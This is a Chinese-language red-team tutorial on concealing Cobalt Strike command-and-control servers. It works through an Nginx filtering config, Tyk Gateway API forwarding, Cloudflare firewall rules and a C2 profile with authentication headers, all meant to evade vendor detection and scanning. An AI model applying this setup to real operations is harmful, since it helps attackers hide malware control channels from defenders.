利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施

colind0pe

2022-08-25

后渗透

Cobalt Strike, Hiding C2 Traffic

本文首发于先知社区，未经允许禁止转载

0x01 前言

Cobalt Strike的特征已经被各大安全厂商标记烂了，加上搜索引擎、空间测绘的扫描，在配置C2域名后，如果不做好基础设施的隐匿，很快会出现下图的情况。（图片截取自某情报社区）

隐藏C2的手法有很多，比如早些时候的域前置和最近热门的利用云函数隐藏。但是如今许多CDN厂商都已经禁用了域前置技术，而云函数是有免费额度的，超过之后会开始计费，许多蓝队反制帖子已经开始分享消耗云函数额度的方法了。

最近看到一篇利用Tyk Gateway API隐藏C2流量的文章，通过配置Tyk Gateway API转发恶意流量，以达到类似于域前置，或者腾讯云函数隐藏C2的效果。

在这个基础上，通过将域名托管到CloudFlare，配置Nginx过滤不符合规则的请求，并通过配置CloudFlare防火墙只允许Tyk Gateway API的流量访问C2域名，可以达到隐藏C2域名，并且防止搜索引擎、空间测绘扫描和识别Cobalt Strike特征导致域名或IP被标记。

本文基于已经将域名托管到CloudFlare并配置SSL证书的情况，如果你不知道如何使用CloudFlare和配置SSL证书，请自行搜索相关资料。

0x02 配置Nginx

将域名托管到CloudFlare后，可以配置Nginx反向代理来过滤部分请求，只让信标流量转发进服务器。

自定义Nginx配置文件

Nginx的配置文件还是有点复杂的，可以使用cs2modrewrite进行生成，然后根据需求进行修改。

这里以使用jquery-c2.4.5.profile作为C2配置文件的情况示例：

1	python3 ./cs2nginx.py -i jquery-c2.4.5.profile -c https://127.0.0.1:8443 -r http://www.baidu.com/ -H yourc2.domain > ./nginx.conf

-i：指定C2配置文件
-c：指定内部的监听端口
-r：指定302跳转的地址
-H：指定你的域名

通过该工具生成的Nginx配置文件的server块的部分配置如下：

server {
        set $C2_SERVER https://127.0.0.1:8443;
        set $REDIRECT_DOMAIN http://www.baidu.com/;
        server_name yourc2.domain;
    	......

        listen 80;
        listen [::]:80;
        
        listen 443 ssl;
        listen [::]:443 ssl;
    	......
        
       	location ~ ^(/jquery-3.3.2.slim.min.js.*|/jquery-3.3.1.min.js.*|/jquery-3.3.1.slim.min.js.*|/jquery-3.3.2.min.js.*)$ {if ( $http_user_agent != "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko")
          {
            return 404;
          }
            proxy_pass          $C2_SERVER;
		......
        }
        location @redirect {
                return 302 $REDIRECT_DOMAIN$request_uri;
        }

        }

使用Nginx加载该配置文件后。Nginx将监听外部的80、443端口，并将符合规则的请求转发到内部的8443端口，不符合规则的请求将跳转到http://www.baidu.com/。

效果

此时通过对服务器IP地址的扫描就无法获取到我们的beacon stage了。

0x03 配置Tyk Gateway API

注册账户

访问注册地址，填写用户名、邮箱、密码等信息后点击注册，注册成功后选择免费版。

然后设置组织名称，设置好后会提示Deployment successful。

创建并配置API

点击Manage APIs后会看到如下页面：

接下来逐一创建并配置http-get API、http-post API、Stager-x86 API、Stager-x64 API。以下以http-get API为例。

假设你的域名为cslabtest.live，且C2配置文件如下：

http-get {
 
    set uri "/api/v2/login";
   ....
}
 
http-post {
 
    set uri "/api/v2/status";
   ....
}
http-stager {
    set uri_x86 "/api/v2/GetProfilePicture";
    set uri_x64 "/api/v2/GetAttachment";
}

点击Design new API并填写API信息。

创建好后进一步配置API，来让它能够将请求转发到我们的C2服务器。

现在我们需要更改Listen path和Target URL，TYK会监听Listen path的地址，并将请求转发到Target URL。

（注：若C2配置文件为jquery-c2.4.5.profile，则将Listen path和Target URL的路径配置为相对应的.js的路径）

为了能够上线CS，还要配置Rate Limiting and Quotas。都选择disable即可。

然后来到Advanced Options，取消勾选Enable caching。

按这个步骤逐一新建http-get API、http-post API、Stager-x86 API、Stager-x64 API。

设置访问验证策略

将上一步新建的API的Authentication更改为Basic Authentication，如下所示：

然后来到Policies新建策略，选择你新建的四个API。

然后点击Global Limits and Quota，确认禁用Rate Limiting。

接着配置策略名称并设置密钥过期时间。

点击Create Policy以保存新策略，之后可以在Policies看到它：

配置访问验证Key

来到Keys，点击ADD KEY，然后在Apply policy选择我们之前创建的策略，并选择API。

最后来到Authentication输入需要设置的用户名、密码，这里使用test:testtesttest作为用户名、密码。

Key创建成功后会有如下提示：

配置C2配置文件

由于上一步我们设置了访问验证，所以要在C2配置文件中添加一个请求头才能正常上线CS。

Authorization的请求头设置格式如下：

1	Authorization: Basic base64(username:password)

所以按上一步添加的Key，我们要在C2配置文件中添加如下请求头：

1	Authorization: Basic dGVzdDp0ZXN0dGVzdHRlc3Q=

最终配置文件如下：

http-get {
 
    set uri "/api/v2/login";
    
    client {
        header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
   ....
}
 
http-post {
 
    set uri "/api/v2/status";
    
    client {
        header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
   ....
}
http-stager {
    set uri_x86 "/api/v2/GetProfilePicture";
    set uri_x64 "/api/v2/GetAttachment";
    
    client {
        header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
	....
}